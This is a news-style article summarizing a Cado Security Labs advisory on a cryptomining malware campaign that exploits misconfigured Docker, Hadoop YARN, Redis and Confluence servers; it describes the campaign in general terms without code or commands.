Security researchers recently uncovered a sophisticated malware campaign that is specifically targeting misconfigured servers hosting web-facing services such as Apache Hadoop YARN, Docker, Confluence, and Redis. This campaign has raised concerns due to its utilization of innovative Golang payloads, which are designed to automate the identification and exploitation of vulnerable hosts.
According to a recent advisory released by Cado Security Labs, the malicious payloads used in this campaign enable Remote Code Execution (RCE) attacks by taking advantage of common misconfigurations and the Confluence vulnerability CVE-2022-26134. Upon gaining initial access to a vulnerable host, the attackers deploy shell scripts and Linux attack techniques to establish persistence and execute a cryptocurrency miner.
Despite the challenges in attributing this campaign to a specific threat actor, the similarities in the shell script payloads used suggest potential connections to previous cloud attacks conducted by threat actors like TeamTNT, WatchDog, and the Kiss a Dog campaign. These connections indicate a level of sophistication and coordination among cybercriminal groups targeting cloud environments.
The discovery of this malware campaign was initiated when researchers at Cado Security Labs observed a cluster of initial access activities on a Docker Engine API honeypot. A Docker command from a specific IP address triggered the creation of a container, which then proceeded to execute various actions, including the creation of executable files and the setting of cron jobs to execute malicious commands.
Further analysis of the malware revealed a complex infection chain that involves multiple payloads and techniques aimed at maintaining access, concealing malicious processes, and spreading the malware to other vulnerable hosts. The malware exhibited anti-forensic techniques and specifically targeted cloud environments such as Alibaba Cloud and Tencent.
One of the payloads, known as fkoths, was observed targeting Docker images for deletion in an effort to cover up traces of initial access. Another payload, s.sh, focused on downloading additional binary payloads and ensuring their persistence on infected hosts. Additionally, the malware deployed specific payloads tailored to exploit vulnerabilities in Apache Hadoop YARN, Confluence, and Redis, using a combination of port scanning, HTTP requests, and shell commands to execute malicious code.
Cado Security warned that this extensive attack highlights the diverse range of initial access techniques utilized by cloud and Linux malware developers. It is evident that attackers are investing significant time and resources into understanding web-facing services deployed in cloud environments, staying informed about reported vulnerabilities, and leveraging this knowledge to infiltrate target environments.
In response to this emerging threat, the Cado advisory includes a list of Indicators of Compromise (IoC) associated with the detected campaigns. These IoCs can help organizations identify and mitigate potential risks posed by this malware campaign targeting misconfigured web-facing servers. By staying vigilant and implementing robust cybersecurity measures, organizations can better defend against similar threats and safeguard their digital assets.